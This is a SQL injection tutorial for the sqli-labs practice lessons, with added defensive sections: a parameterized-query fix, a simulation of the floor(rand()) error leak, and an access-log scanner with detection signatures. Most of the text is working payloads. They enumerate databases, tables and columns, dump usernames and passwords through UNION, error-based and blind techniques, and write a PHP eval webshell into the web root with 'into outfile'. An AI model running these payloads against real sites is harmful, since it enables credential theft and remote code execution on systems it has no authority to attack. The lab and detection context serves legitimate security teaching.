Contents
General injection steps:
1. Find the closing character
2. Choose the injection technique
3. Enumerate the databases
4. Enumerate the table names
5. Enumerate the column names
6. Dump the field values
Basic SQL injection statements
order by 3   (determines how many columns the query has)
union select 1,2,3
union select 1,version(),database()
union select 1,user(),group_concat(schema_name) from information_schema.schemata
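Why the closing-character step and the "order by N" probe work at all, and what stops them, as an added example that is not part of the original notes: the lab code pastes id between single quotes, so the quote in the input closes the literal and the rest is parsed as SQL. The stand-in database below is constructed with SQLite instead of MySQL (so the page's %23 comment becomes --, and there is no information_schema); the table and row contents are invented. The parameterized version receives exactly the same input and returns nothing, which is the fix for every lesson on this page.

```python
import sqlite3

# Constructed stand-in for the lab's "security" database (SQLite, not MySQL).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
        CREATE TABLE secrets(id INTEGER, token TEXT, owner TEXT);
        INSERT INTO secrets VALUES (1, 'tok-constructed-0001', 'svc-account');
    """)
    return conn

def vulnerable_lookup(conn, user_input):
    # Same shape as the lab code: the id is pasted between single quotes,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE id='%s' LIMIT 1" % user_input
    return conn.execute(sql).fetchall()

def safe_lookup(conn, user_input):
    # Parameterized: the value travels separately from the statement text,
    # so quotes, UNION and comment markers inside it are data, never SQL.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 1"
    return conn.execute(sql, (user_input,)).fetchall()

def raises_db_error(lookup, conn, user_input):
    # The page's column-count probe works because a wrong "order by N"
    # produces a server error; returning that error to the client is what
    # makes the probe readable. Here we just report whether one occurs.
    try:
        lookup(conn, user_input)
        return False
    except sqlite3.OperationalError:
        return True

# The page's payloads with -- instead of %23 (#), since SQLite has no # comment.
PROBE_ORDER_BY_4 = "1' order by 4 -- "
UNION_PAYLOAD = "0' union select id, token, owner from secrets -- "

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, UNION_PAYLOAD))  # the secrets row is returned
    print(safe_lookup(db, UNION_PAYLOAD))        # []
    print(raises_db_error(vulnerable_lookup, db, PROBE_ORDER_BY_4))  # True
```

The id=0 trick from the UNION section is visible here too: with a non-existent id the first SELECT contributes no row, so the only row the page shows is the one the attacker appended. Binding the parameter, plus not echoing database errors to the client, removes both the injection and the probe.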
Less-1
?id=1'
?id=1' order by 3 %23
?id=1' order by 4 %23   (errors, so the query has three columns)
UNION injection
id=0 is used so that the original query matches no row and only the UNION row is displayed
?id=0' union select 1,2,3 %23
?id=0' union select 1,user(),database() %23
?id=0' union select 1,user(),schema_name from information_schema.schemata %23
group_concat() concatenates all values of one column (all rows sharing that column) into a single string.
concat() joins two or more values into one string.
List the databases
?id=0' union select 1,user(),group_concat(schema_name) from information_schema.schemata %23
List the tables in a database
Tables in the security database
?id=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' %23
List all columns of a table
Columns of the users table
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
Read the contents of the table
?id=0' union select 1,group_concat(id),group_concat(password) from security.users %23
?id=0' union select 1,group_concat(username),group_concat(password) from security.users %23
?id=0' union select 1,2,@@datadir %23   (shows the data directory path)
Less-2
?id=1 and 1=1 %23
?id=1 and 1=2 %23
?id=1 order by 3 %23
?id=1 order by 4 %23
The remaining steps are the same as Less-1.
Less-3
?id=1'
The error is echoed back
?id=1') and 1=1 %23
?id=1') and 1=2 %23
?id=0') order by 4 %23
Less-4
Error-based
?id=0") union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema="security" %23
?id=0") union select 1,user(),group_concat(column_name) from information_schema.columns where table_name="users" %23
Less-5
ASCII codes
?id=1' order by 3 %23
?id=1' and ascii(substr(database(),1,1))=115 %23
floor injection
select 1 from (select count(*) ,concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x) a
A select produces a table; the first (outer) table needs no alias.
The second (derived) table must be given an alias, otherwise MySQL errors.
a is the alias of (select count(*) ,concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x)
x is the alias of concat(version(),floor(rand(0)*2))
floor(rand(0)*2)
floor rounds down to an integer
count(*) is the aggregate that is returned; it is required, otherwise the query errors
The hex encoding of : is 0x3a
The hex encoding of ~ is 0x7e
?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x7e,database(),0x7e,user(),0x7e) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a --+
?id=1' union select null,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e,floor(rand()*2))as a from information_schema.tables group by a%23
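The notes above say what the aliases are but not why the query errors, which is the point a defender needs in order to understand what the error message leaks. The simulation below is an added example, not code from the original notes or from MySQL: it models how GROUP BY builds its temporary table when the grouping key is non-deterministic. The key expression is evaluated once to look the group up and, if the group is new, evaluated again when the row is inserted; with floor(rand(0)*2) the two evaluations can differ, so an insert can collide with an existing key and MySQL reports "Duplicate entry ... for key" containing the key itself, which is where the payload places version(), database(), and so on. The value sequence 0,1,1,0,1,1 is the commonly cited prefix produced by rand(0) and the prefix string is constructed; the three-row minimum is why the page groups over information_schema.tables, which always has many rows.

```python
# Simulation of MySQL's GROUP BY temporary table with a non-deterministic key.
# Constructed model for illustration, not MySQL's actual implementation.

FLOOR_RAND0_PREFIX = [0, 1, 1, 0, 1, 1]   # commonly cited first values of floor(rand(0)*2)

def simulate_group_by(rand_bits, row_count, prefix="5.7-constructed~"):
    """Process row_count rows; the key is prefix + floor(rand()*2).

    Returns ("ok", {key: count}) when grouping succeeds, or
    ("duplicate", key, row_number) when the second evaluation of the key
    collides with a key already in the temporary table.
    """
    bits = iter(rand_bits)
    groups = {}
    for row in range(1, row_count + 1):
        # First evaluation: look the group up.
        probe_key = prefix + str(next(bits))
        if probe_key in groups:
            groups[probe_key] += 1
            continue
        # Group not found: the key is evaluated AGAIN for the insert.
        insert_key = prefix + str(next(bits))
        if insert_key in groups:
            # This is the "Duplicate entry '<key>' for key 'group_key'" error;
            # the message echoes the key, i.e. whatever was concatenated into it.
            return ("duplicate", insert_key, row)
        groups[insert_key] = 1
    return ("ok", groups)

if __name__ == "__main__":
    print(simulate_group_by(FLOOR_RAND0_PREFIX, 3))        # duplicate on row 3
    print(simulate_group_by(FLOOR_RAND0_PREFIX, 2))        # ok: two rows are not enough
    print(simulate_group_by([0] * 10, 5))                  # ok: deterministic key never collides
```

Two defensive observations follow directly from the model: the technique only yields data because the server's error text reaches the client, so returning a generic error page neutralises it even before the query is parameterized; and because the leak is carried in an error, a sudden rise in duplicate-key errors on SELECT statements in the database error log is a usable detection signal.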
XPath error-based injection
The updatexml() function
updatexml(XML_document, XPath_string, new_value);
- First parameter: XML_document, a string
- Second parameter: XPath_string, a string in XPath format, giving the path
- Third parameter: new_value, a string that replaces the data matched by the path
Tip: XPath_string is what triggers the error. concat() joins the pieces into one string that is not valid XPath syntax, so a syntax error is raised and the string is leaked in the error message.
0x7e is ~, which is not valid XPath syntax; any character other than @ / . (or their hex encodings) will do.
?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(id) from security.users),0x7e),1) %23
?id=1' and updatexml(1,concat(0x7e,(select group_concat(password) from security.users),0x7e),1) %23
The error message does not show all of it
?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1) %23
Likewise, change the offset after limit to view the database names one at a time
?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),1) %23
View the table names one at a time
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1) --+
The extractvalue() function
extractvalue(XML_document, xpath_string)
- First parameter: a string, the name of the XML document object; it can be anything.
- Second parameter: xpath_string, a string in XPath format
Works the same way as updatexml()
?id=1' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) %23
Less-6
Just change ' to "; the other commands are the same as in Less-5.
Less-7
?id=1'   (errors)
?id=1"
?id=1')) and 1=1 %23
?id=1')) and 1=2 %23   (errors)
Writing data out to a file
?id=1')) union select 1,2,version() into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\1.txt' %23
?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\2.txt' %23
?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\3.txt' %23
Uploading a one-line webshell
?id=1')) union select user(),2,'<?php eval($_POST["cmd"]);?>' into outfile 'C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\1.php' %23
Less-8
Boolean-based blind injection
Substring functions, the mid function, and the ASCII function
left(str, length)   takes length characters from the left of the string
right(str, length)   takes length characters from the right of the string
mid(str, start, length)
str is required; start is required; length is optional
First, find the closing character
?id=1' %23
Choose boolean-based blind injection as the technique
Guess the length of the database name
?id=1' and (length(database())) >10 %23   False
?id=1' and (length(database())) = 8 %23   True
Guess the database name
?id=1' and (ascii(substr((select database()) ,1,1))) >96 %23   True
?id=1' and (ascii(substr((select database()) ,1,1))) = 115 %23   True
?id=1' and (ascii(substr((select database()) ,2,1))) = 101 %23   True
...continuing this way, the database name is found to be security...
Guess the length of the table name
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 5 %23   False
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 %23   True
?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 %23   True
...looking for the table named users...
Guess the table name
Check whether it is correct
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 %23
...one character at a time... confirms the table is users
left() can also be used
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users" %23
Guess the column names
?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23   True
Guess the field values
?id=1' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23   True
...this has to be tried one character at a time... very tedious...
Try another way to guess the username
?id=1' and left((select username from users limit 0,1),4)="Dumb" %23   True
?id=1' and left((select username from users limit 7,1),5)="admin" %23   True
?id=1' and left((select username from users limit 8,1),5)="admin" %23   True
Note that left() has a small drawback: in this example, any value whose first 5 characters match gives the same result, so admin, admin1 and admin# all succeed. Use it with care!
Less-9
Time-based blind injection
if(expr1, expr2, expr3)
If expr1 is true, returns expr2, otherwise returns expr3
Determine the closing character
?id=1'+ %23
Inject using the delay
?id=1'+and+if(1=1, sleep(5), null)+ %23
?id=1'+and (length(database()))=8+and+if(1=1, sleep(5), null)+ %23
?id=1'+and (ascii(substr((select database()) ,1,1)))=115+and+if(1=1, sleep(3), null)+ %23
...one character at a time... judged by the response time...
Less-10
Change ' to "; the remaining steps are the same.
Go and try it yourself!
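Every technique walked through in Less-1 to Less-9 leaves a characteristic trace in the web server's access log, because the payload travels in the id parameter of a GET request. The scanner below is an added example, not part of the original notes: it URL-decodes each request target and matches it against constructed signatures for the UNION, information_schema, updatexml/extractvalue, floor(rand()), ascii/substr, sleep() and into outfile patterns shown above. The log lines are constructed to mirror the page's payloads (the IP addresses, timestamps and paths are invented), and the signature list is a starting point rather than a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed signatures, one per technique shown in Less-1 .. Less-9.
SIGNATURES = {
    "union_select":     r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b",
    "order_by_probe":   r"\border\s+by\s+\d+",
    "schema_enum":      r"\binformation_schema\.",
    "xpath_error":      r"\b(?:updatexml|extractvalue)\s*\(",
    "floor_rand_error": r"\bfloor\s*\(\s*rand\s*\(",
    "boolean_blind":    r"\b(?:ascii|length|left|mid|substr|substring)\s*\(",
    "time_blind":       r"\b(?:sleep|benchmark)\s*\(",
    "file_write":       r"\binto\s+(?:out|dump)file\b",
    "server_vars":      r"@@\w+",
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in SIGNATURES.items()}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')

# Constructed access-log lines (Apache combined format) mirroring the page's payloads.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/Oct/2023:12:00:07 +0000] "GET /Less-1/?id=1%27%20order%20by%204%20%23 HTTP/1.1" 200 540',
    '203.0.113.5 - - [10/Oct/2023:12:00:15 +0000] "GET /Less-1/?id=0%27%20union%20select%201,user(),group_concat(schema_name)%20from%20information_schema.schemata%20%23 HTTP/1.1" 200 990',
    '203.0.113.5 - - [10/Oct/2023:12:01:02 +0000] "GET /Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)%20%23 HTTP/1.1" 200 610',
    '203.0.113.5 - - [10/Oct/2023:12:01:40 +0000] "GET /Less-7/?id=1%27))%20union%20select%201,2,version()%20into%20outfile%20%27/tmp/x.txt%27%20%23 HTTP/1.1" 200 402',
    '203.0.113.5 - - [10/Oct/2023:12:02:11 +0000] "GET /Less-8/?id=1%27%20and%20(ascii(substr((select%20database()),1,1)))=115%20%23 HTTP/1.1" 200 812',
    '203.0.113.5 - - [10/Oct/2023:12:02:30 +0000] "GET /Less-9/?id=1%27+and+if(1=1,+sleep(5),+null)+%23 HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Oct/2023:12:03:00 +0000] "GET /Less-1/?id=2&page=1 HTTP/1.1" 200 830',
]

def normalize(target):
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are caught;
    # '+' becomes a space, which is how the Less-9 payloads are written.
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(line):
    """Return the set of signature names that match one log line."""
    m = REQUEST_RE.search(line)
    target = normalize(m.group(1) if m else line)
    return {name for name, rx in COMPILED.items() if rx.search(target)}

def scan(lines):
    """Return (index, sorted tags) for every line that matches at least one signature."""
    hits = []
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits.append((i, sorted(tags)))
    return hits

if __name__ == "__main__":
    for idx, tags in scan(LOG_LINES):
        print(idx, tags)
```

Two notes on using this in practice. The boolean-blind and time-blind lessons show why a single hit is less telling than the pattern: the same client issuing dozens of near-identical requests that differ only in a numeric comparison, or whose response times cluster around the sleep() argument, is the signal to alert on, so the scan output is best aggregated per source address. And the Less-7 "into outfile" hit deserves the highest priority, because it indicates an attempt to write to the web root rather than only to read data.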